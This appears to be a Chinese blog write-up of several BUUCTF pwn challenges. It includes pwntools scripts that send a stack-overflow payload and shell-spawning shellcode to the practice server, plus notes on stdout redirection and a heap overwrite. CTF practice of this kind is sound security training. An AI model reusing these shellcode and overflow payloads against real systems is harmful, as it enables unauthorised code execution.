首页 > 其他分享 >WP(BUU)

WP(BUU)

时间:2023-07-30 23:23:15浏览次数:42  
标签:覆写 BUU context WP pwn import shellcode payload

最近要做点堆题练练手感了,回buu

记不住是第几个题了,直接标个号列这里吧

0x01 mrctf2020_easyoverflow

简单的栈上覆写
呵呵 感觉这题最费劲的是找那个破b字符串

from pwn import *
from LibcSearcher import *
context(arch='amd64',os='linux')
#context(log_level='debug')
r=remote("node4.buuoj.cn",25508)
#r=process("./pwn")
elf=ELF("./pwn")

payload=0x30*b'a'+b"n0t_r3@11y_f1@g"
r.sendline(payload)
r.interactive()

0x02 [ZJCTF 2019]Login

中间有个题之前做过了,就不贴在这了
勾石一样的c++逆向,和上文一样的栈上覆写

0x03 wustctf2020_closed

和hgame2023的一个题是一样的,exec 1>&0重定向一下就好了

0x04 jarvisoj_level1

这题buu环境铁有点什么问题,不回显,强制过了回显之后shellcode也打不通
libc的话也是搞出来了个奇怪的东西,本地两个方法都能打通,远程一个都不行
感觉题的本意是想要shellcode的,贴个码

from pwn import *
from LibcSearcher import *
context(arch='i386',os='linux')
#context(log_level='debug')
r=remote("node4.buuoj.cn",29855)
#r=process("./pwn")
elf=ELF("./pwn")

r.sendline("1")
r.recvuntil("this:0x")
shellcodeaddr=int(r.recv(8),16)
print(hex(shellcodeaddr))

shellcode=asm(shellcraft.sh())
payload=shellcode+b'a'*(0x8c-len(shellcode))+p32(shellcodeaddr)
r.sendline(payload)

r.interactive()

0x05 hitcontraining_magicheap

很清晰的堆题,目的是覆写bss段上的一个地方>4869
但是方法不怎么会,这个题放在堆的0x06

标签:覆写,BUU,context,WP,pwn,import,shellcode,payload
From: https://www.cnblogs.com/luo486/p/17592342.html

相关文章

  • [SWPUCTF 2021 新生赛]no_wakeup
    [SWPUCTF2021新生赛]no_wakeup题目来源:nssctf题目类型:web涉及考点:PHP反序列化1.题目给了一个点击按钮,点进去看看:进去后就是代码审计了:<?phpheader("Content-type:text/html;charset=utf-8");error_reporting(0);show_source("class.php");classHaHaHa{p......
  • BUUCTF Findkey
     对题目分析:if(Msg==517){if(strlen(String1)>6)//String位数小于等于6ExitProcess(0);if(strlen(String1)){memset(v17,0,sizeof(v17));v6=strlen(String1);memcpy(v17,......
  • CTFer成长记录——CTF之Web专题·buuctf—secretfile
    一、题目链接https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Secret%20File二、解法步骤  打开网页:  看看源码:  访问下:  继续看源码:  继续访问:  发现并没有跳转到action.php这个地方,而是到了end.php,猜测这里有猫腻......
  • [SWPUCTF 2021 新生赛]pop
    [SWPUCTF2021新生赛]pop题目来源:nssctf题目类型:web涉及考点:PHP反序列化、pop链1.上来先做代码审计<?phperror_reporting(0);show_source("index.php");classw44m{private$admin='aaa';protected$passwd='123456';publicfunction......
  • wpf在设计器模式利用模拟数据展现控件
    使用VisualStudio开发WPF应用程序时,控件显示需要的数据如果来路比较“苦难”,比如来自数据库,JSON文件,复杂计算等,这时候,如果想看到控件带有数据的展示效果,需要启动调试,这很麻烦。我们可以在XAML中使用designtime语法给控件赋予模拟数据MSDN教程,也可以在后台使用csharp代码判断当......
  • 如何使用 WPF 用户控件关闭父窗口
    HowtocloseparentwindowsusingWPFUserControl如何使用WPF用户控件关闭父窗口【问题描述】假设有两个WPF窗口:window1和window2。window1有一个按钮,单击此按钮将打开window2。window2包含一个用户控件。此用户控件有一个用于关闭window2的按钮。怎样才能实现这个场景......
  • WPF
    WPF官网介绍WPF的开源控件库HanyControl 可观察对象ObservableObject ObservableRecipient 继承至ObservableObject ObservableValidator继承至ObservableObject ......
  • wpf ScrollViewer 滚动动画
    wpfScrollViewer滚动动画:<Windowx:Class="WpfTest.FloatTextWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d=&qu......
  • 2023-7-27 WPF自定义命名空间在xaml中的使用
    xaml自定义命名空间【作者】长生为啥要用自定义命名空间这是常见的几种命名空间xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:local="clr-namespace:Rxsfadsf"xmlns:s......
  • 2023-7-27WPF的ContextMenu的传参绑定方式
    WPF的ContextMenu的绑定方式【作者】长生ContextMenu为何不能正常绑定在wpf中ContextMenu和ToolTip一样都是弹出层,与VisualTree已经分离了,只不过ToolTip在wpf中有进行特殊处理,所以可以正常绑定。个人觉得ContextMenu绑定的最可靠的方式首先添加BindingProxy类,继承Freezab......